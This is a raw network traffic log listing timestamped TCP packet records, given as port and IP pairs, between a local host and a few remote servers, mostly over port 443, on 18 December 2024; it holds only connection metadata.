                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031346083 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031403065 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031447887 CET49714443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:49.031476974 CET44349714104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.009238005 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.009640932 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.009674072 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.010004044 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.010303974 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.010364056 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.010457039 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.051361084 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.093518019 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.210333109 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.210645914 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.210673094 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.211035967 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.211380959 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.211450100 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.211510897 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.255347013 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.525676966 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.525728941 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.525821924 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.525861979 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.526994944 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.527060032 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.527080059 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.533808947 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.533880949 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.533912897 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.542438030 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.542521000 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.542540073 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.550864935 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.550954103 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.550981998 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.603462934 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.603502989 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.651494026 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.667718887 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.667802095 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.667881012 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.668752909 CET49716443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.668773890 CET44349716104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.673408031 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.673439980 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.673537970 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.673949003 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.673959017 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.717381954 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.720458984 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.720594883 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.720683098 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.728497028 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.728585005 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.728612900 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.736485958 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.736574888 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.736603975 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.743953943 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.744040012 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.744054079 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.759057999 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.759167910 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.759180069 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.766962051 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.767047882 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.767056942 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.774477005 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.774545908 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.774578094 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.782255888 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.782363892 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.782428026 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.790019035 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.790098906 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.790131092 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.843456030 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.843501091 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.889538050 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.911478043 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.911873102 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.911936045 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.911951065 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.919044018 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.919097900 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.919111013 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.927349091 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.927409887 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.927418947 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.931763887 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.931838989 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.931847095 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.949819088 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.949831963 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.950053930 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.950087070 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.956408024 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.956491947 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.956501961 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.956559896 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.962287903 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.974415064 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.974514008 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.974524021 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.974594116 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.980998039 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.981019974 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.981077909 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.993247032 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.993266106 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:50.993361950 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.005242109 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.005249977 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.005350113 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.017493010 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.017502069 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.017584085 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.100435019 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.100651979 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.103423119 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.103637934 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.111000061 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.111092091 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.121464014 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.121680975 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.132806063 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.133003950 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.138180971 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.138326883 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.149082899 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.149353981 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154320002 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154478073 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154491901 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154587030 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154886961 CET49715443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.154908895 CET44349715104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.158209085 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.158305883 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.158458948 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.158749104 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.158783913 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.173842907 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.173872948 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.173984051 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.174259901 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.174273014 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.309520006 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.309554100 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.309669018 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.309897900 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.309911013 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.883277893 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.883584976 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.883610010 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.883934975 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.884238958 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.884299994 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.884402037 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:51.927329063 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.331013918 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.331098080 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.331161022 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.332160950 CET49718443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.332182884 CET44349718104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.374021053 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.374352932 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.374414921 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.374751091 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.375075102 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.375166893 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.375243902 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.415327072 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.454844952 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.455231905 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.455251932 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.456403017 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.456871986 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.457048893 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.457109928 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.500488043 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.500497103 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.500611067 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.520154953 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.520558119 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.520582914 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.520927906 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.521291018 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.521363020 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.521469116 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.521507978 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.521547079 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.824773073 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.825562954 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.825627089 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.825633049 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.825658083 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.825699091 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.826987982 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.828491926 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.828541040 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.828557968 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.833194017 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.833249092 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.833257914 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.835467100 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.849869013 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.849937916 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.849950075 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.898431063 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918690920 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918725014 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918734074 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918786049 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918797970 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.918833971 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.932521105 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.932924032 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.932930946 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.933021069 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.933171034 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.933219910 CET44349720192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.933273077 CET49720443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.944434881 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.994426966 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:52.994474888 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.020180941 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.020262957 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.020297050 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.023448944 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.023498058 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.023554087 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.023567915 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.026643991 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.026683092 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.026701927 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.026710033 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.026751995 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.027996063 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.029742002 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.029810905 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.029836893 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.031357050 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.031415939 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.031423092 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.037836075 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.037904024 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.037929058 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.039447069 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.039514065 CET49722443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.039532900 CET44349722104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.045849085 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.045917988 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.045950890 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.054368973 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.054435968 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.054454088 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.061878920 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.061943054 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.061981916 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.070141077 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.070204020 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.070223093 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.078418016 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.078486919 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.078507900 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.086394072 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.086458921 CET49719443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.086473942 CET44349719104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:53.089428902 CET49722443192.168.2.16104.18.95.41
